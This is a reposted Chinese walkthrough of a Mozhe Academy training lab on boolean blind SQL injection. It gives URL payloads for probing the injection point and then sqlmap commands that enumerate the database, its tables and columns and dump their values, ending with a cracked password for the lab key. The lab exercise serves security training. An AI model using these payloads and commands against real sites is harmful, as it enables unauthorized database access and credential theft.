1500字范文,内容丰富有趣,写作好帮手!
1500字范文 > 墨者学院——SQL注入漏洞测试(布尔盲注)

墨者学院——SQL注入漏洞测试(布尔盲注)

时间:2019-03-15 07:55:33

相关推荐

墨者学院——SQL注入漏洞测试(布尔盲注)

本次靶场操作步骤来源于 CSDN-吃肉唐僧

本次靶场使用windows系统和kali Linux系统

1.点击页面进去,发现浮动的通告进度条,找到SQL注入点

2.在地址栏中输入:/new_list.php?id=1' and 1=1 ,这样页面就变成空白的了

3.输入/new_list.php?id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型

4.然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10

首先这里确定了这个数据库的长度(10)和类型(数字型),接下来就用bp抓网页内容

5.在kali终端新建一个后缀名为.txt的文件,然后打开bp,将在网页上打开的通知网页的URL复制在bp上进行抓包,将下面的内容复制并保存在.txt文件里面

这里主要说一下就是,我们访问的是静态网页,所以每次抓到的都是一样的内容,如果说设置的浏览器(我这里的浏览器是chrome)不一样,你可以对比一下我抓到的内容有没有什么不一样

6.回到kali终端,输入查找数据库的命令:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 --dbs --dbms mysql --batch

7.接着向下,找数据库里面的数据表:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 --tables --batch

8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch

9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch

最后的最后将密码解密一下,然后回到登录网页,就能看到Key,然后提交

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。